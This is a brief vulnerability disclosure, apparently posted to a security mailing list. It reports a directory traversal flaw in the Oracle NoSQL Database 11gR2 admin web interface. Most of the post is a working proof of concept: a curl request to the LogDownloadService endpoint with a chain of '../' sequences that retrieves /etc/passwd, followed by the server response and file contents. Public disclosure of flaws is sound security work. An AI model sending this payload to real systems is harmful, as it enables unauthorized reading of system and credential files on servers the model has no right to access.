Oracle NoSQL Directory Traversal

`Hi List,  
  
I don't know if this worth anything, because the manual says:  
  
"Oracle NoSQL Database is intended to be installed in a secure  
location where physical and network access to the store is restricted  
to trusted users. For this reason, at this time Oracle NoSQL  
Database's security model is designed to prevent accidental access to  
the data. It is not designed to prevent malicious access or  
denial-of-service attacks."  
  
Anyway, here is the deal:  
  
+++  
  
$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd  
  
* About to connect() to 127.0.0.1 port 5001 (#0)  
* Trying 127.0.0.1... connected  
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)  
> GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1  
> User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18  
> Host: 127.0.0.1:5001  
> Accept: */*  
>  
< HTTP/1.1 200 OK  
< Content-Type: application/octet-stream  
< Content-Length: 1668  
< Content-Disposition: attachment;  
filename="../../../../../../../../../../../../../../../etc/passwd"  
< Server: Jetty(7.4.0.v20110414)  
<  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
[...]  
  
+++  
  
Software: Oracle NoSQL Database 11gR2.1.1.100  
  
Regards,  
  
Buherator  
  
`